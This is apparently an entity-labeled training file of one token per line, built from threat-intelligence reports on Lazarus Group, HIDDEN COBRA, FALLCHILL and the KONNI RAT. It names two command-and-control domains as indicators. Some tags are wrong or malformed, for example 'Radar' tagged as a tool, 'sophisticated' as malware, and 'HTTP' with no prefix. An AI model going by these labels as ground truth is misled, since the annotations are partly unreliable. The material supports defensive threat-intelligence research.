+KillDisk S-MAL
+in O
+the O
+attack O
+scenario O
+most O
+likely O
+served O
+one O
+of O
+two O
+purposes O
+: O
+the O
+attackers S-APT
+covering O
+their O
+tracks O
+after O
+an O
+espionage O
+operation O
+, O
+or O
+it O
+was O
+used O
+directly O
+for O
+extortion O
+or O
+cyber-sabotage S-APT
+. O
+
+Today O
+we'd O
+like O
+to O
+share O
+some O
+of O
+our O
+findings O
+, O
+and O
+add O
+something O
+new O
+to O
+what O
+'s O
+currently O
+common O
+knowledge O
+about O
+Lazarus B-ACT
+Group I-ACT
+activities E-ACT
+, O
+and O
+their O
+connection O
+to O
+the O
+much O
+talked O
+about O
+February B-TIME
+2016 E-TIME
+incident O
+, O
+when O
+an O
+unknown O
+attacker S-APT
+attempted O
+to O
+steal O
+up O
+to O
+$851M O
+USD O
+from O
+Bangladesh B-IDTY
+Central I-IDTY
+Bank E-IDTY
+. O
+
+Since O
+the O
+Bangladesh S-LOC
+incident O
+there O
+have O
+been O
+just O
+a O
+few O
+articles O
+explaining O
+the O
+connection O
+between O
+Lazarus B-APT
+Group E-APT
+and O
+the O
+Bangladesh S-LOC
+bank S-IDTY
+heist O
+. O
+
+However O
+, O
+from O
+this O
+it O
+'s O
+only O
+clear O
+that O
+Lazarus S-APT
+might O
+have O
+attacked O
+Polish O
+banks S-IDTY
+. O
+
+Symantec S-SECTEAM
+also O
+confirmed O
+seeing O
+the O
+Lazarus S-APT
+wiper O
+tool O
+in O
+Poland S-LOC
+at O
+one O
+of O
+their O
+customers S-IDTY
+. O
+
+Considering O
+that O
+the O
+afterhack O
+publications O
+by O
+the O
+media S-IDTY
+mentioned O
+that O
+the O
+investigation O
+stumbled O
+upon O
+three O
+different O
+attackers S-APT
+, O
+it O
+was O
+not O
+obvious O
+whether O
+Lazarus S-APT
+was O
+the O
+one O
+responsible O
+for O
+the O
+fraudulent O
+SWIFT O
+transactions O
+, O
+or O
+if O
+Lazarus S-APT
+had O
+in O
+fact O
+developed O
+its O
+own O
+malware O
+to O
+attack O
+banks S-IDTY
+' O
+systems O
+. O
+
+We O
+would O
+like O
+to O
+add O
+some O
+strong O
+facts O
+that O
+link O
+some O
+attacks O
+on O
+banks S-IDTY
+to O
+Lazarus S-APT
+, O
+and O
+share O
+some O
+of O
+our O
+own O
+findings O
+as O
+well O
+as O
+shed O
+some O
+light O
+on O
+the O
+recent O
+TTPs O
+used O
+by O
+the O
+attacker S-APT
+, O
+including O
+some O
+yet O
+unpublished O
+details O
+from O
+the O
+attack O
+in O
+Europe S-LOC
+in O
+2017 S-TIME
+. O
+
+Lazarus B-ACT
+attacks E-ACT
+are O
+not O
+a O
+local O
+problem O
+and O
+clearly O
+the O
+group O
+'s O
+operations O
+span O
+across O
+the O
+whole O
+world O
+. O
+
+Lazarus S-APT
+was O
+previously O
+known O
+to O
+conduct O
+cyberespionage B-ACT
+and I-ACT
+cybersabotage I-ACT
+activities E-ACT
+, O
+such O
+as O
+attacks O
+on O
+Sony B-IDTY
+Pictures I-IDTY
+Entertainment E-IDTY
+with O
+volumes O
+of O
+internal O
+data O
+leaked O
+, O
+and O
+many O
+system O
+harddrives O
+in O
+the O
+company O
+wiped O
+. O
+
+We O
+believe O
+that O
+Lazarus B-APT
+Group E-APT
+is O
+very O
+large O
+and O
+works O
+mainly O
+on O
+infiltration O
+and O
+espionage B-ACT
+operations E-ACT
+, O
+while O
+a O
+substantially O
+smaller O
+units O
+within O
+the O
+group O
+, O
+which O
+we O
+have O
+dubbed O
+Bluenoroff S-APT
+, O
+is O
+responsible O
+for O
+financial O
+profit O
+. O
+
+Lazarus S-APT
+regrouped O
+and O
+rushed O
+into O
+new O
+countries O
+, O
+selecting O
+mostly O
+poorer O
+and O
+less O
+developed O
+locations O
+, O
+hitting O
+smaller O
+banks S-IDTY
+because O
+they O
+are O
+, O
+apparently O
+, O
+easy O
+prey O
+. O
+
+To O
+date O
+, O
+the O
+Lazarus B-APT
+group E-APT
+has O
+been O
+one O
+of O
+the O
+most O
+successful O
+in O
+launching O
+large O
+scale O
+operations O
+against O
+the O
+financial B-IDTY
+industry E-IDTY
+. O
+
+We O
+believe O
+that O
+Lazarus S-APT
+will O
+remain O
+one O
+of O
+the O
+biggest O
+threats O
+to O
+the O
+banking B-IDTY
+sector E-IDTY
+, O
+finance S-IDTY
+, O
+and O
+trading B-IDTY
+companies E-IDTY
+, O
+as O
+well O
+as O
+casinos S-IDTY
+for O
+the O
+next O
+few O
+years O
+. O
+
+We O
+believe O
+Lazarus S-APT
+started O
+this O
+watering B-ACT
+hole I-ACT
+attack E-ACT
+at O
+the O
+end B-TIME
+of I-TIME
+2016 E-TIME
+after O
+their O
+other O
+operation O
+was O
+interrupted O
+in O
+South B-LOC
+East I-LOC
+Asia E-LOC
+. O
+
+We O
+believe O
+they O
+started O
+this O
+watering B-ACT
+hole I-ACT
+campaign E-ACT
+at O
+the O
+end B-TIME
+of I-TIME
+2016 E-TIME
+after O
+their O
+other O
+operation O
+was O
+interrupted O
+in O
+South B-LOC
+East I-LOC
+Asia E-LOC
+. O
+
+A O
+rudimentary O
+but O
+somewhat O
+clever O
+design O
+, O
+KiloAlfa S-MAL
+provides O
+keylogging O
+capability O
+for O
+the O
+Lazarus B-APT
+Group E-APT
+'s O
+collection O
+of O
+malicious O
+tools O
+. O
+
+The O
+design O
+of O
+KiloAlfa S-MAL
+is O
+broken O
+down O
+into O
+two O
+basic O
+components O
+: O
+the O
+persistence O
+functionality O
+and O
+the O
+keylogging B-MAL
+functionality E-MAL
+. O
+
+The O
+persistence O
+functionality O
+of O
+KiloAlfa S-MAL
+allows O
+the O
+malware O
+to O
+self-install O
+on O
+a O
+victim O
+'s O
+machine O
+when O
+activated O
+( O
+described O
+below O
+) O
+. O
+
+Evidence O
+suggest O
+that O
+the O
+Lazarus B-APT
+Group E-APT
+uses O
+compromised B-MAL
+infrastructure E-MAL
+as O
+the O
+public-facing O
+touchpoint O
+for O
+the O
+majority O
+of O
+their O
+malware O
+samples O
+. O
+
+PapaAlfa S-MAL
+is O
+believed O
+to O
+be O
+one O
+of O
+the O
+proxy O
+malware O
+components O
+that O
+the O
+Lazarus B-APT
+Group E-APT
+uses O
+to O
+hide O
+the O
+true O
+command O
+and O
+control O
+server O
+for O
+operations O
+. O
+
+Rather O
+, O
+PapaAlfa S-MAL
+could O
+be O
+considered O
+a O
+smart O
+proxy O
+due O
+in O
+part O
+to O
+the O
+fact O
+that O
+the O
+Lazarus S-APT
+can O
+easily O
+switch O
+the O
+backend O
+destination O
+address O
+and O
+PROT O
+without O
+having O
+to O
+reestablish O
+control O
+over O
+the O
+infected O
+machine O
+hosting O
+the O
+PapaAlfa S-MAL
+malware S-MAL
+. O
+
+In O
+terms O
+of O
+form O
+factor O
+, O
+PapaAlfa S-MAL
+comes O
+in O
+two O
+flavors O
+: O
+service B-MAL
+DLL E-MAL
+and O
+standalone B-MAL
+executable E-MAL
+. O
+
+The O
+IndiaBravo-PapaAlfa B-MAL
+installer E-MAL
+is O
+responsible O
+for O
+installing O
+the O
+service O
+DLL S-TOOL
+variant O
+. O
+
+While O
+the O
+tools O
+profiled O
+in O
+this O
+report O
+are O
+not O
+inherently O
+malicious O
+, O
+their O
+capabilities O
+are O
+nonetheless O
+integral O
+to O
+the O
+Lazarus B-APT
+Group E-APT
+'s O
+cyber O
+operations O
+, O
+both O
+espionage S-ACT
+and O
+destructive O
+in O
+nature O
+, O
+making O
+them O
+inherently O
+dangerous O
+to O
+potential O
+victims O
+. O
+
+These O
+tools O
+often O
+lay O
+the O
+groundwork O
+for O
+further O
+malicious B-ACT
+activity E-ACT
+, O
+such O
+as O
+the O
+targeting O
+of O
+antivirus O
+capabilities O
+and O
+the O
+disabling O
+of O
+firewalls O
+, O
+both O
+of O
+which O
+are O
+very O
+fundamental O
+defensive O
+measures O
+. O
+
+Furthermore O
+, O
+like O
+many O
+other O
+identified O
+Lazarus B-APT
+Group E-APT
+families O
+, O
+these O
+tools O
+showcase O
+the O
+group O
+'s O
+creative O
+solutions O
+, O
+such O
+as O
+the O
+PapaAlfa S-MAL
+, O
+which O
+makes O
+it O
+difficult O
+to O
+immediately O
+identify O
+potentially O
+malicious B-ACT
+activity E-ACT
+on O
+a O
+compromised O
+network O
+. O
+
+The O
+first O
+class O
+, O
+colloquially O
+known O
+as O
+" O
+wipers S-MAL
+" O
+, O
+are O
+a O
+class O
+of O
+malware O
+has O
+the O
+primary O
+intent O
+of O
+destroying O
+data O
+on O
+a O
+victim O
+'s O
+machine O
+. O
+
+DDoS S-MAL
+malware S-MAL
+floods O
+a O
+target O
+'s O
+network-connected O
+service O
+with O
+an O
+excessive O
+number O
+of O
+request O
+at O
+once O
+in O
+order O
+to O
+overload O
+the O
+capacity O
+of O
+the O
+server O
+. O
+
+For O
+example O
+, O
+DeltaAlfa S-FILE
+specifies O
+a O
+DDoS B-MAL
+bot E-MAL
+family O
+identified O
+as O
+Alfa O
+. O
+
+The O
+naming O
+scheme O
+used O
+by O
+Novetta S-SECTEAM
+for O
+the O
+malware O
+identified O
+during O
+Operation B-ACT
+Blockbuster E-ACT
+consists O
+of O
+at O
+least O
+two O
+identifiers O
+which O
+each O
+identifier O
+coming O
+from O
+the O
+International B-IDTY
+Civil I-IDTY
+Aviation I-IDTY
+Organization E-IDTY
+( O
+ICAO S-IDTY
+) O
+'s O
+phonetic O
+alphabet O
+,2 O
+commonly O
+referred O
+to O
+as O
+the O
+NATO O
+phonetic O
+alphabet O
+. O
+
+Loaders O
+are O
+typically O
+responsible O
+for O
+loading O
+a O
+DLL S-TOOL
+component O
+into O
+memory O
+given O
+that O
+a O
+DLL S-TOOL
+cannot O
+operate O
+in O
+a O
+standalone O
+mode O
+such O
+as O
+an O
+executable O
+. O
+
+This O
+report O
+will O
+explore O
+the O
+various O
+installers S-MAL
+, O
+uninstallers S-MAL
+and O
+loaders O
+Novetta S-SECTEAM
+has O
+observed O
+the O
+Lazarus B-APT
+Group E-APT
+using O
+. O
+
+This O
+reverse O
+engineering O
+report O
+looks O
+at O
+the O
+RATs S-MAL
+and O
+staging S-MAL
+malware S-MAL
+found O
+within O
+the O
+Lazarus B-APT
+Group E-APT
+'s O
+collection O
+. O
+
+Regardless O
+of O
+their O
+sophistication O
+or O
+refinement O
+, O
+the O
+malware O
+families O
+within O
+the O
+Lazarus B-APT
+Group E-APT
+'s O
+India S-LOC
+and O
+Lima S-LOC
+classes O
+perform O
+at O
+a O
+reasonable O
+level O
+for O
+their O
+designed O
+purpose O
+: O
+the O
+introduction O
+and O
+persistence O
+of O
+malware O
+from O
+the O
+Lazarus B-APT
+Group E-APT
+on O
+a O
+victim O
+'s O
+infrastructure O
+. O
+
+While O
+the O
+capabilities O
+for O
+the O
+installers S-MAL
+, O
+loaders S-MAL
+, O
+and O
+uninstallers S-MAL
+in O
+this O
+report O
+are O
+relatively O
+straight O
+forward O
+and O
+single-focused O
+, O
+analysis O
+of O
+these O
+malware O
+families O
+provide O
+further O
+insight O
+into O
+the O
+capabilities O
+of O
+the O
+Lazarus B-APT
+Group E-APT
+. O
+
+The O
+Lazarus B-APT
+Group E-APT
+employs O
+a O
+variety O
+of O
+RATs S-MAL
+that O
+operate O
+in O
+both O
+client O
+mode O
+and O
+server O
+mode O
+. O
+
+The O
+most O
+common O
+communication O
+mode O
+for O
+a O
+RAT S-MAL
+is O
+to O
+act O
+as O
+a O
+client S-ACT
+to O
+a O
+remote O
+server O
+. O
+
+The O
+Lazarus B-APT
+Group E-APT
+employs O
+a O
+variety O
+of O
+RATs S-MAL
+and O
+staging S-MAL
+malware S-MAL
+to O
+conduct O
+cyber O
+operations O
+, O
+many O
+of O
+which O
+contain O
+significant O
+code O
+overlap O
+that O
+points O
+to O
+at O
+least O
+a O
+shared O
+development O
+environment O
+. O
+
+While O
+some O
+members O
+within O
+the O
+Romeo S-APT
+and O
+Sierra B-APT
+groups E-APT
+may O
+not O
+implement O
+sound O
+authentication O
+strategies O
+, O
+shift O
+their O
+design O
+focus O
+in O
+abrupt O
+and O
+unusual O
+manners O
+, O
+and O
+fail O
+to O
+understand O
+the O
+pitfalls O
+of O
+distributed O
+command O
+networks O
+, O
+on O
+the O
+whole O
+the O
+families O
+within O
+the O
+Lazarus B-APT
+Group E-APT
+'s O
+collection O
+of O
+RATs S-MAL
+and O
+staging S-MAL
+malware S-MAL
+perform O
+their O
+tasks O
+with O
+surprising O
+effectiveness O
+. O
+
+This O
+new O
+campaign O
+, O
+dubbed O
+HaoBao S-ACT
+, O
+resumes O
+Lazarus S-APT
+' O
+previous O
+phishing B-ACT
+emails S-TOOL
+, O
+posed O
+as O
+employee O
+recruitment O
+, O
+but O
+now O
+targets O
+Bitcoin B-IDTY
+users E-IDTY
+and O
+global O
+financial B-IDTY
+organizations E-IDTY
+. O
+
+This O
+new O
+campaign O
+, O
+dubbed O
+HaoBao S-ACT
+, O
+resumes O
+Lazarus S-APT
+' O
+previous O
+phishing B-ACT
+emails S-TOOL
+, O
+posed O
+as O
+employee O
+recruitment O
+, O
+but O
+now O
+targets O
+financial B-IDTY
+organizations E-IDTY
+. O
+
+McAfee B-SECTEAM
+Advanced I-SECTEAM
+Threat I-SECTEAM
+Research E-SECTEAM
+analysts O
+have O
+discovered O
+an O
+aggressive O
+Bitcoin-stealing B-ACT
+phishing I-ACT
+campaign E-ACT
+by O
+the O
+international O
+cybercrime O
+group O
+Lazarus S-APT
+that O
+uses O
+sophisticated S-MAL
+malware S-MAL
+with O
+long-term O
+impact O
+. O
+
+McAfee B-SECTEAM
+Advanced I-SECTEAM
+Threat I-SECTEAM
+Research E-SECTEAM
+( O
+ATR S-SECTEAM
+) O
+analysts O
+have O
+discovered O
+an O
+aggressive O
+Bitcoin-stealing B-ACT
+phishing I-ACT
+campaign E-ACT
+by O
+the O
+international O
+cybercrime O
+group O
+Lazarus S-APT
+that O
+uses O
+sophisticated S-MAL
+malware S-MAL
+with O
+long-term O
+impact O
+. O
+
+Beginning O
+in O
+2017 S-TIME
+, O
+the O
+Lazarus B-APT
+group E-APT
+heavily O
+targeted O
+individuals O
+with O
+spear B-ACT
+phishing E-ACT
+emails S-TOOL
+impersonating O
+job B-IDTY
+recruiters E-IDTY
+which O
+contained O
+malicious O
+documents O
+. O
+
+The O
+use O
+of O
+decoy B-MAL
+documents E-MAL
+also O
+reveals O
+some O
+of O
+the O
+potential O
+targets O
+of O
+the O
+Lazarus B-APT
+group E-APT
+'s O
+malicious B-ACT
+activity E-ACT
+, O
+specifically O
+the O
+use O
+spear B-ACT
+phishing I-ACT
+attacks E-ACT
+observed O
+targeting O
+South B-LOC
+Korean E-LOC
+government S-IDTY
+and O
+aerospace B-IDTY
+organizations E-IDTY
+. O
+
+The O
+campaign O
+lasted O
+from O
+April S-TIME
+to O
+October S-TIME
+and O
+used O
+job O
+descriptions O
+relevant O
+to O
+target O
+organizations O
+, O
+in O
+both O
+English O
+and O
+Korean O
+language O
+. O
+
+The O
+Lazarus B-APT
+Group E-APT
+'s O
+objective O
+was O
+to O
+gain O
+access O
+to O
+the O
+target O
+'s O
+environment O
+and O
+obtain O
+key O
+military O
+program O
+insight O
+or O
+steal O
+money O
+. O
+
+In O
+this O
+latest O
+discovery O
+by O
+McAfee S-SECTEAM
+, O
+despite O
+a O
+short O
+pause O
+in O
+similar O
+operations O
+, O
+the O
+Lazarus B-APT
+group E-APT
+targets O
+financial B-IDTY
+organizations E-IDTY
+. O
+
+This O
+campaign O
+is O
+tailored O
+to O
+identifying O
+those O
+who O
+are O
+running O
+Bitcoin S-TOOL
+related O
+software O
+through O
+specific O
+system O
+scans O
+. O
+
+This O
+Malware O
+Analysis O
+Report O
+( O
+MAR O
+) O
+is O
+the O
+result O
+of O
+analytic O
+efforts O
+between O
+the O
+Department B-SECTEAM
+of I-SECTEAM
+Homeland I-SECTEAM
+Security E-SECTEAM
+( O
+DHS S-SECTEAM
+) O
+and O
+the O
+Federal B-IDTY
+Bureau I-IDTY
+of I-IDTY
+Investigation E-IDTY
+( O
+FBI S-IDTY
+) O
+. O
+
+When O
+victims O
+open O
+malicious O
+documents O
+attached O
+to O
+the O
+emails S-TOOL
+, O
+the O
+malware O
+scans O
+for O
+Bitcoin B-ACT
+activity E-ACT
+and O
+then O
+establishes O
+an O
+implant O
+for O
+long-term O
+data-gathering O
+. O
+
+According O
+to O
+trusted O
+third-party O
+reporting O
+, O
+HIDDEN B-APT
+COBRA I-APT
+actors E-APT
+have O
+likely O
+been O
+using O
+FALLCHILL S-MAL
+malware S-MAL
+since O
+2016 S-TIME
+to O
+target O
+the O
+aerospace S-IDTY
+, O
+telecommunications S-IDTY
+, O
+and O
+finance B-IDTY
+industries E-IDTY
+. O
+
+The O
+malware O
+is O
+a O
+fully O
+functional O
+RAT S-MAL
+with O
+multiple O
+commands O
+that O
+the O
+actors S-APT
+can O
+issue O
+from O
+a O
+command O
+and O
+control O
+( O
+C2 S-TOOL
+) O
+server O
+to O
+a O
+victim O
+'s O
+system O
+via O
+dual O
+proxies O
+. O
+
+FALLCHILL S-MAL
+typically O
+infects O
+a O
+system O
+as O
+a O
+file O
+dropped O
+by O
+other O
+HIDDEN B-MAL
+COBRA I-MAL
+malware E-MAL
+or O
+as O
+a O
+file O
+downloaded O
+unknowingly O
+by O
+users O
+when O
+visiting O
+sites O
+compromised O
+by O
+HIDDEN B-APT
+COBRA I-APT
+actors E-APT
+. O
+
+HIDDEN B-APT
+COBRA I-APT
+actors E-APT
+use O
+an O
+external B-MAL
+tool E-MAL
+or O
+dropper S-MAL
+to O
+install O
+the O
+FALLCHILL S-MAL
+malware S-MAL
+to O
+establish O
+persistence O
+. O
+
+HIDDEN B-APT
+COBRA I-APT
+actors E-APT
+install O
+the O
+FALLCHILL S-MAL
+malware S-MAL
+to O
+establish O
+persistence O
+. O
+
+Working O
+with O
+U.S. S-LOC
+government S-IDTY
+partners O
+, O
+DHS S-SECTEAM
+and O
+FBI S-SECTEAM
+identified O
+Internet B-PROT
+Protocol E-PROT
+( O
+IP S-PROT
+) O
+addresses O
+and O
+other O
+indicators O
+of O
+compromise O
+( O
+IOCs O
+) O
+associated O
+with O
+a O
+remote B-MAL
+administration I-MAL
+tool E-MAL
+( O
+RAT S-MAL
+) O
+used O
+by O
+the O
+North B-LOC
+Korean E-LOC
+government—commonly O
+known O
+as O
+FALLCHILL S-MAL
+. O
+
+This O
+alert O
+'s O
+IOC B-FILE
+files E-FILE
+provide O
+HIDDEN B-APT
+COBRA E-APT
+indicators O
+related O
+to O
+FALLCHILL S-MAL
+. O
+
+McAfee B-SECTEAM
+Advanced I-SECTEAM
+Threat I-SECTEAM
+Research E-SECTEAM
+analysts O
+have O
+uncovered O
+a O
+global O
+data O
+reconnaissance O
+campaign O
+assaulting O
+a O
+wide O
+number O
+of O
+industries O
+including O
+critical B-IDTY
+infrastructure E-IDTY
+, O
+entertainment S-IDTY
+, O
+finance S-IDTY
+, O
+health B-IDTY
+care E-IDTY
+, O
+and O
+telecommunications S-IDTY
+. O
+
+Because O
+of O
+this O
+, O
+additional O
+HIDDEN B-MAL
+COBRA I-MAL
+malware E-MAL
+may O
+be O
+present O
+on O
+systems O
+compromised O
+with O
+FALLCHILL S-MAL
+. O
+
+This O
+campaign O
+, O
+dubbed O
+Operation B-ACT
+GhostSecret E-ACT
+, O
+leverages O
+multiple O
+implants O
+, O
+tools O
+, O
+and O
+malware O
+variants O
+associated O
+with O
+the O
+state-sponsored O
+cyber O
+group O
+HIDDEN B-APT
+COBRA E-APT
+. O
+
+From O
+March B-TIME
+18 E-TIME
+to O
+26 S-TIME
+we O
+observed O
+the O
+malware O
+operating O
+in O
+multiple O
+LOCs O
+of O
+the O
+world O
+. O
+
+Furthermore O
+, O
+the O
+Advanced B-SECTEAM
+Threat I-SECTEAM
+Research E-SECTEAM
+team O
+has O
+discovered O
+Proxysvc S-MAL
+, O
+which O
+appears O
+to O
+be O
+an O
+undocumented O
+implant O
+. O
+
+Our O
+investigation O
+into O
+this O
+campaign O
+reveals O
+that O
+the O
+actor S-APT
+used O
+multiple O
+malware O
+implants O
+, O
+including O
+an O
+unknown O
+implant O
+with O
+capabilities O
+similar O
+to O
+Bankshot S-MAL
+. O
+
+The O
+attackers S-APT
+behind O
+Operation B-ACT
+GhostSecret E-ACT
+used O
+a O
+similar O
+infrastructure O
+to O
+earlier O
+threats O
+, O
+including O
+SSL B-MAL
+certificates E-MAL
+used O
+by O
+FakeTLS S-MAL
+in O
+implants O
+found O
+in O
+the O
+Destover B-MAL
+backdoor E-MAL
+variant O
+known O
+as O
+Escad S-MAL
+, O
+which O
+was O
+used O
+in O
+the O
+Sony B-ACT
+Pictures E-ACT
+attack O
+. O
+
+Based O
+on O
+our O
+analysis O
+of O
+public O
+and O
+private O
+information O
+from O
+submissions O
+, O
+along O
+with O
+product O
+telemetry O
+, O
+it O
+appears O
+Proxysvc S-MAL
+was O
+used O
+alongside O
+the O
+2017 S-TIME
+Destover S-MAL
+variant O
+and O
+has O
+operated O
+undetected O
+since O
+mid-2017 S-TIME
+. O
+
+This O
+new O
+variant O
+resembles O
+parts O
+of O
+the O
+Destover S-MAL
+malware S-MAL
+, O
+which O
+was O
+used O
+in O
+the O
+2014 S-TIME
+Sony B-ACT
+Pictures E-ACT
+attack O
+. O
+
+The O
+Lazarus S-APT
+used O
+a O
+similar O
+infrastructure O
+to O
+earlier O
+threats O
+, O
+including O
+the O
+Destover B-MAL
+backdoor E-MAL
+variant O
+known O
+as O
+Escad S-MAL
+. O
+
+The O
+McAfee B-SECTEAM
+Advanced I-SECTEAM
+Threat I-SECTEAM
+Research E-SECTEAM
+team O
+discovered O
+a O
+previously O
+unknown O
+data-gathering B-FILE
+implant E-FILE
+that O
+surfaced O
+in O
+mid-February B-TIME
+2018 E-TIME
+. O
+
+The O
+Advanced B-SECTEAM
+Threat I-SECTEAM
+Research E-SECTEAM
+team O
+uncovered O
+activity O
+related O
+to O
+this O
+campaign O
+in O
+March B-TIME
+2018 E-TIME
+, O
+when O
+the O
+actors S-APT
+targeted O
+Turkish S-LOC
+banks S-IDTY
+. O
+
+KONNI S-MAL
+: O
+A O
+Malware O
+Under O
+The O
+Radar S-TOOL
+For B-TIME
+Years E-TIME
+. O
+
+
+Talos S-SECTEAM
+has O
+discovered O
+an O
+unknown O
+Remote B-MAL
+Administration I-MAL
+Tool E-MAL
+that O
+we O
+believe O
+has O
+been O
+in O
+use O
+for O
+over B-TIME
+3 I-TIME
+years E-TIME
+. O
+
+During O
+this O
+time O
+it O
+has O
+managed O
+to O
+avoid O
+scrutiny O
+by O
+the O
+security O
+community O
+. O
+
+The O
+current O
+version O
+of O
+the O
+malware O
+allows O
+the O
+operator O
+to O
+steal O
+files O
+, O
+keystrokes O
+, O
+perform O
+screenshots O
+, O
+and O
+execute O
+arbitrary O
+code O
+on O
+the O
+infected O
+host O
+. O
+
+Talos S-SECTEAM
+has O
+named O
+this O
+malware O
+KONNI S-MAL
+. O
+
+Throughout O
+the O
+multiple O
+campaigns O
+observed O
+over O
+the O
+last O
+3 O
+years O
+, O
+the O
+actor O
+has O
+used O
+an O
+email B-ACT
+attachment E-ACT
+as O
+the O
+initial O
+infection O
+vector O
+. O
+
+They O
+then O
+use O
+additional O
+social O
+engineering O
+to O
+prompt O
+the O
+target O
+to O
+open O
+a O
+.scr S-FILE
+file O
+, O
+display O
+a O
+decoy O
+document O
+to O
+the O
+users O
+, O
+and O
+finally O
+execute O
+the O
+malware O
+on O
+the O
+victim's O
+machine O
+. O
+
+The O
+malware O
+infrastructure O
+of O
+the O
+analysed O
+samples O
+was O
+hosted O
+by O
+a O
+free O
+web O
+hosting O
+provider: O
+000webhost O
+. O
+
+The O
+malware O
+has O
+evolved O
+over O
+time O
+. O
+
+In O
+this O
+article O
+, O
+we O
+will O
+analyse O
+this O
+evolution: O
+at O
+the O
+beginning O
+the O
+malware O
+was O
+only O
+an O
+information O
+stealer O
+without O
+remote O
+administration O
+, O
+it O
+moved O
+from O
+a O
+single O
+file O
+malware O
+to O
+a O
+dual O
+file O
+malware O
+(an O
+executable O
+and O
+a O
+dynamic B-TOOL
+library E-TOOL
+) O
+, O
+the O
+malware O
+has O
+supported O
+more O
+and O
+more O
+features O
+over O
+the O
+time O
+, O
+the O
+decoy O
+documents O
+have O
+become O
+more O
+and O
+more O
+advanced O
+. O
+
+The O
+different O
+versions O
+contain O
+copy/pasted O
+code O
+from O
+previous O
+versions O
+. O
+
+Moreover O
+the O
+new O
+version O
+searches O
+for O
+files O
+generated O
+by O
+previous O
+versions O
+. O
+
+This O
+evolution O
+is O
+illustrated O
+across O
+4 O
+campaigns S-ACT
+: O
+one O
+in O
+2014 S-TIME
+, O
+one O
+in O
+2016 S-TIME
+and O
+finally O
+two O
+in O
+2017 S-TIME
+. O
+
+The O
+decoy O
+document O
+of O
+the O
+2 O
+last O
+campaigns S-ACT
+suggests O
+that O
+the O
+targets O
+are O
+public O
+organisations O
+. O
+
+Both O
+documents O
+contained O
+email S-TOOL
+addresses O
+, O
+phone O
+numbers O
+and O
+contacts O
+of O
+members O
+of O
+official B-IDTY
+organizations E-IDTY
+such O
+as O
+United B-IDTY
+Nations E-IDTY
+, O
+UNICEF S-IDTY
+, O
+and O
+Embassies S-IDTY
+linked O
+to O
+North B-LOC
+Korea E-LOC
+. O
+
+In O
+this O
+campaign O
+, O
+the O
+dropper O
+filename O
+was O
+beauty.scr S-FILE
+. O
+
+Based O
+on O
+the O
+compilation O
+date O
+of O
+the O
+two O
+binaries O
+, O
+this O
+campaign S-ACT
+took O
+place O
+in O
+September B-TIME
+2014 E-TIME
+. O
+
+Once O
+executed O
+, O
+two O
+files O
+were O
+dropped O
+on O
+the O
+targeted O
+system O
+: O
+a O
+decoy O
+document O
+(a O
+picture) O
+and O
+a O
+fake O
+svchost.exe S-FILE
+binary O
+. O
+
+Both O
+files O
+were O
+stored O
+in O
+"C:\Windows" S-FILE
+. O
+
+The O
+fake O
+svchost O
+binary O
+is O
+the O
+KONNI S-MAL
+malware O
+. O
+
+The O
+first O
+task O
+of O
+the O
+malware O
+is O
+to O
+generate O
+an O
+ID O
+to O
+identify O
+the O
+infected O
+system O
+. O
+
+This O
+ID O
+is O
+generated O
+based O
+on O
+the O
+installation O
+date O
+of O
+the O
+system O
+. O
+
+The O
+second O
+task O
+of O
+malware O
+is O
+to O
+ping O
+the O
+CC O
+and O
+get O
+orders O
+. O
+
+The O
+malware O
+includes O
+2 O
+domains: O
+phpschboy.prohosts.org S-DOM
+, O
+jams481.site.bz S-DOM
+. O
+
+The O
+developer O
+used O
+the O
+Microsoft B-TOOL
+Winsocks I-TOOL
+API E-TOOL
+to O
+handle O
+the O
+network O
+connection O
+. O
+
+Surprisingly O
+, O
+this O
+isn't O
+the O
+easiest O
+or O
+the O
+most O
+efficient O
+technical O
+choice O
+for O
+HTTP PROT
+connection O
+. O
+
+The O
+malware O
+samples O
+we O
+analysed O
+connected O
+to O
+only O
+one O
+URI: O
+<c2-domain>/login.php S-DOM
+. O
+
+This O
+version O
+of O
+KONNI S-MAL
+is O
+not O
+designed O
+to O
+execute O
+code O
+on O
+the O
+infected O
+system O
+. O
+
+The O
+purpose O
+is O
+to O
+be O
+executed O
+only O
+once O
+and O
+steal O
+data O
+on O
+the O
+infected O
+system O
+, O
+here O
+are O
+the O
+main O
+features O
+: O
+Keyloggers O
+, O
+Clipboard O
+stealer O
+, O
+Firefox S-IDTY
+profiles O
+and O
+cookies O
+stealer O
+, O
+Chrome S-IDTY
+profiles O
+and O
+cookies O
+stealer O
+, O
+Opera S-IDTY
+profiles O
+and O
+cookies O
+stealer O
+. O
+
+The O
+name O
+of O
+the O
+.scr S-FILE
+file O
+was O
+directly O
+linked O
+to O
+tension O
+between O
+North B-LOC
+Korea E-LOC
+and O
+USA S-LOC
+in O
+March B-TIME
+2016 E-TIME
+more O
+information O
+. O
+
+Based O
+on O
+the O
+compilation O
+dates O
+of O
+the O
+binaries O
+, O
+the O
+campaign O
+took O
+place O
+in O
+the O
+same O
+period O
+. O
+
+An O
+interesting O
+fact O
+: O
+the O
+dropped O
+library O
+was O
+compiled O
+in O
+2014 S-TIME
+and O
+appears O
+in O
+our O
+telemetry O
+in O
+August B-TIME
+2015 E-TIME
+. O
+
+Indicating O
+that O
+this O
+library O
+was O
+probably O
+used O
+in O
+another O
+campaign O
+. O
+
+The O
+.scr S-FILE
+file O
+contains O
+2 O
+Office S-TOOL
+documents O
+. O
+
+The O
+first O
+document O
+was O
+in O
+English O
+and O
+a O
+second O
+in O
+Russian O
+. O
+
+In O
+the O
+sample O
+only O
+the O
+English O
+version O
+can O
+be O
+displayed O
+to O
+the O
+user O
+(that O
+is O
+hardcoded O
+in O
+the O
+sample) O
+. O
+
+The O
+Russian O
+document O
+is O
+not O
+used O
+by O
+the O
+sample O
+, O
+we O
+assume O
+that O
+the O
+author O
+of O
+the O
+malware O
+forgot O
+to O
+remove O
+the O
+resource O
+containing O
+the O
+Russia S-LOC
+decoy O
+document O
+. O
+
+The O
+malware O
+author O
+changed O
+the O
+malware O
+architecture O
+, O
+this O
+version O
+is O
+divided O
+in O
+two O
+binaries: O
+conhote.dll S-FILE
+, O
+winnit.exe S-FILE
+. O
+
+Another O
+difference O
+is O
+the O
+directory O
+where O
+the O
+files O
+are O
+dropped O
+, O
+it's O
+no O
+longer O
+C:\Windows S-FILE
+but O
+rather O
+the O
+local O
+setting O
+of O
+the O
+current O
+user O
+(%USERPROFILE%\Local B-FILE
+Settings\winnit\winnit.exe) E-FILE
+. O
+
+Thanks O
+to O
+this O
+modification O
+, O
+the O
+malware O
+can O
+be O
+executed O
+with O
+a O
+non-administrator O
+account O
+. O
+
